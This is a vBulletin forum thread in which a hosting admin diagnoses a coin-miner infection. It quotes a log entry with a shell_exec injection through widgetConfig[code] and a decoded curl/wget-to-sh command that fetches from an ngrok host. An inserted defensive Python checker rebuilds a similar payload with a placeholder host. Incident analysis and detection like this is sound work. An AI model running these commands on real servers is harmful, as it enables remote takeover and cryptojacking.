Not a forum member but wanted to share coin miner virus infection issue
  • Not a forum member but wanted to share coin miner virus infection issue

    Hi,

    vBulletin® Version 5.3.2. We host the site, I do not have the owner's login credentials to this forum. Please excuse if this post is inappropriate. That is not my intention. If we need to repost in your tech forum we will contact our customer accordingly for credentials.

    We have been plagued with the Multios.Coinminer.Miner and the Unix.Malware.Agent viruses the past few days.
    The vector it is using to infect is a vbulletin site - or so it seems.
    Sample log
    0191018:[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 194.99.105.75] ModSecurity: Warning. Pattern match "\\\\W{4,}" at ARGS:widgetConfig[code].
    [file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"]
    [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');
    found within ARGS:widgetConfig[code]: echo shell_exec('echo KGN1cmwgLW0gMzAgLXNrICdodHRwOi8vNWE1Yjk5OTgubmdyb2suaW8vZi9zZXJ2ZT9sPXYmcj1kZmEzYmNhOGE1MD IwYzNlMjdjZjY4ZjhlZDFjMjJkNycgfHwgd2dldCAtcSAtTy0gImh0dHA6Ly81YTViOTk5OC5uZ3Jvay5pby9mL3Nl cnZlP2w9diZyPWRmYTNiY2E4YTUwMjBjM2UyN2NmNjhmOGVkMWMyMmQ3IiApIHwgc2g=|base64 -d|sh;echo HHKU8JE');

    Decode the base64 string =
    (curl -m 30 -sk 'http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7' || wget -q -O- "http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7" ) | sh

    No question this is the source of the virus infections. I downloaded the code...

    The client IPs change but they all point to only one vBulletin site we host, and the time stamps within the website access logs match exactly the virus files' and directories' creation times.
    Is this a known bug - maybe with widget code in some way and we need to upgrade/patch? Posting before upgrading to see if this is a known issue with our version first.

    Site permissions seem perfect.

    Thank you

    -Nick
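As an added defensive example (not code from the original post or from vBulletin), a small Python checker that does what the post does by hand: it pulls the ARGS:widgetConfig[code] value out of a ModSecurity error-log line, decodes any "echo <base64>|base64 -d" blob while tolerating the whitespace that log wrapping inserts (as in the quoted line), and reports the client IP, the download URLs and whether the decoded text pipes into sh. The sample line, the host example-c2.invalid and the client IP are constructed placeholders, and the code assumes the [data "..."] field is closed by "] as in the quoted log.

```python
import base64
import binascii
import re

# Constructed sample, modelled on the ModSecurity line quoted above; the host
# (example-c2.invalid) and client IP are placeholders, not values from the post.
PAYLOAD = ("(curl -m 30 -sk 'http://example-c2.invalid/f/serve?l=v' || "
           "wget -q -O- 'http://example-c2.invalid/f/serve?l=v') | sh")
_B64 = base64.b64encode(PAYLOAD.encode()).decode()
_B64 = _B64[:40] + " " + _B64[40:]  # mimic the whitespace that log wrapping inserts
SAMPLE_LINE = (
    "[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 192.0.2.10] "
    'ModSecurity: Warning. Pattern match "\\\\W{4,}" at ARGS:widgetConfig[code]. '
    '[id "960024"] [data "Matched Data: \'); found within ARGS:widgetConfig[code]: '
    "echo shell_exec('echo " + _B64 + "|base64 -d|sh;echo MARKER');\"]"
)

CLIENT_RE = re.compile(r"\[client ([0-9a-fA-F.:]+)\]")
WIDGET_RE = re.compile(r"ARGS:widgetConfig\[code\]:\s*(.*?)\"\]")
B64_PIPE_RE = re.compile(r"echo\s+([A-Za-z0-9+/=\s]{16,}?)\s*\|\s*base64\s+-d")
URL_RE = re.compile(r"https?://[^\s'\"()|]+")

def decode_blob(blob):
    """Decode one base64 blob, stripping whitespace that wrapping may have inserted."""
    cleaned = re.sub(r"\s+", "", blob)
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def analyze_line(line):
    """Return a finding dict for a line whose widgetConfig[code] argument carries an
    'echo <b64>|base64 -d' pipeline, or None when the line does not hit that parameter."""
    m = WIDGET_RE.search(line)
    if not m:
        return None
    code = m.group(1)
    client = CLIENT_RE.search(line)
    decoded = [d for d in map(decode_blob, B64_PIPE_RE.findall(code)) if d]
    return {
        "client": client.group(1) if client else None,
        "shell_exec": "shell_exec(" in code,
        "decoded": decoded,
        # download hosts to block at egress and to hunt for in other logs
        "urls": sorted({u for d in decoded for u in URL_RE.findall(d)}),
        "pipes_to_shell": any(re.search(r"\|\s*sh\b", d) for d in decoded),
    }
```

Run it over the Apache error log with a loop over its lines; a non-None result with pipes_to_shell set is the event to correlate against the file creation times the post mentions.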


  • #2
    vBulletin 5.3.2 is severely outdated and is known to have an exploit which has been patched in the latest version of the software.

    Only the customer who purchased the license has access to the Members Area which is necessary in order to download the patched version of the software.



    • #3
      <vBulletin 5.3.2 is severely outdated

      Are you smoking something? It's 3 months old; that is when vBulletin installed it.

      FYI, it would be nice if registered customers were notified when discoveries [easy hacks] like these are made.

      Regardless thank you for your response.



      • #4
        Ignore last post. Ooops. It is old!



        • #5
          Closing thread as this is not a pre-sales issue.

          VB 5.3.2 is very old and not safe to use. All customers should have upgraded by now.
